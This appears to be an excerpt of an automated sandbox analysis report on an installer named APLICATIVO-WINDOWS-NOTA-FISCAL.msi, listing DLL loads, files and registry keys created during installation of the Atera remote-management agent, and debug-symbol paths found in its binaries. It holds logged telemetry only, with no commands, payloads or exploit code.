                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sppc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: napinsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: pnrpnsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wshbth.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: nlaapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winrnr.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wscapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wtsapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winsta.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: devobj.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: tpmcoreprovisioning.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: certenroll.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: devobj.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: certca.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsparse.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: tbs.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: rasapi32.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile written: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA NetworksJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgentJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe.configJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}Jump to behavior
                                Source: APLICATIVO-WINDOWS-NOTA-FISCAL.msiStatic file information: File size 2994176 > 1048576
                                Source: Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2766545680.000000EFDD1B3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F84000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: CliWrap.Signaler.pdb source: CliWrap.dll.26.dr
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdbdeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2766545680.000000EFDD1B3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb source: AgentPackageAgentInformation.exe, 00000015.00000002.1983854282.0000015E7D2E2000.00000002.00000001.01000000.00000018.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2972609455.00000153FD172000.00000002.00000001.01000000.00000049.sdmp, AgentPackageSystemTools.exe, 00000039.00000002.2534525146.0000025FBFA22000.00000002.00000001.01000000.0000003D.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F62000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000000.2335964500.0000022039CD2000.00000002.00000001.01000000.00000027.sdmp
                                Source: Binary string: \??\C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.PDB~ source: rundll32.exe, 00000037.00000003.2569504567.0000000002F55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570515142.0000000002F55000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdbd source: AgentPackageUpgradeAgent.exe, 0000002A.00000000.2335964500.0000022039CD2000.00000002.00000001.01000000.00000027.sdmp
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdb source: AgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmp
                                Source: Binary string: C:\projects\structuremap\src\StructureMap\obj\Release\net45\StructureMap.pdb source: AgentPackageMonitoring.exe, 00000023.00000002.2089230351.000001F71D202000.00000002.00000001.01000000.00000020.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentCommunication.Models\obj\Release\net45\Atera.AgentCommunication.Models.pdbSHA256G source: AgentPackageInternalPoller.exe, 0000002F.00000002.2462648805.0000022B9AFD2000.00000002.00000001.01000000.00000037.sdmp
                                Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net6.0-Release/System.Diagnostics.EventLog.pdbSHA256 source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: D:\a\41\s\AteraNugetPackages\Atera.AgentPackages.CommonLib\Atera.AgentPackages.CommonLib\obj\Release\Atera.AgentPackages.CommonLib.pdb'` source: Atera.AgentPackages.CommonLib.dll2.26.dr
                                Source: Binary string: dows\dll\mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F84000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netstandard1.1\System.Memory.pdb source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\LiorKovarsky\Downloads\sharpsnmplib-11.3.0\sharpsnmplib-11.3.0\SharpSnmpLib\obj\Release\net45\win\SharpSnmpLib.pdbSHA256 source: AgentPackageInternalPoller.exe, 0000002F.00000002.2469228610.0000022B9B262000.00000002.00000001.01000000.0000003B.sdmp
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdb source: AteraAgent.exe, 0000000D.00000002.2387388686.0000021C5B7C2000.00000002.00000001.01000000.0000002C.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageProgramManagement\AgentPackageProgramManagement\obj\Release\AgentPackageProgramManagement.pdb source: AgentPackageProgramManagement.exe, 00000031.00000000.2383010410.00000153FCB72000.00000002.00000001.01000000.0000002B.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageProgramManagement\ThirdPartyPackageManager\obj\Release\ThirdPartyPackageManager.pdb source: AgentPackageProgramManagement.exe, 00000031.00000002.2972259017.00000153FD142000.00000002.00000001.01000000.00000048.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageAgentInformation\AgentPackageAgentInformation\obj\Release\AgentPackageAgentInformation.pdb source: AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.1961278345.000002156B882000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: C:\projects\polly\src\Polly\obj\Release\netstandard1.1\Polly.pdb source: AgentPackageMonitoring.exe, 00000023.00000002.2121847916.000001F735C42000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: d:\slave\workspace\GIT_WIN_SRS_Formal\Source\irisserver\Release\SRUnPackFile.pdb source: SplashtopStreamer.exe, 00000038.00000000.2464305472.000000000042E000.00000002.00000001.01000000.00000039.sdmp, SplashtopStreamer.exe, 00000038.00000002.2597319611.000000000042E000.00000002.00000001.01000000.00000039.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000003.00000003.1660899653.0000000004990000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.000000000474F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004044000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2569441750.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.00000000047F0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570707211.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: symbols\exe\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2766545680.000000EFDD1B3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdbSIK source: rundll32.exe, 00000037.00000003.2569504567.0000000002F55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570515142.0000000002F55000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\AlphaControlAgentInstallation.pdbpdbion.pdb source: rundll32.exe, 00000037.00000003.2569441750.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570707211.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: CliWrap.Signaler.pdbSHA256 source: CliWrap.dll.26.dr
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\AgentPackageTicketing\obj\Release\AgentPackageTicketing.pdbTlnl `l_CorExeMainmscoree.dll source: AgentPackageTicketing.exe, 0000002C.00000000.2361394254.00000214714D2000.00000002.00000001.01000000.00000028.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2784658706.000002203A692000.00000002.00000001.01000000.00000044.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\ship\x86\wixca.pdb source: APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.dr
                                Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/Release/net8.0/System.ServiceProcess.ServiceController.pdbSHA256~ source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: c:\borrar\EmptyDll\Release\EmptyDll.pdb source: AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE7C4000.00000002.00000001.01000000.0000004C.sdmp
                                Source: Binary string: C:\buildAgent\work\1b72bc6dac87fa71\code_drop\merge\chocolatey.pdb source: AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE7C4000.00000002.00000001.01000000.0000004C.sdmp
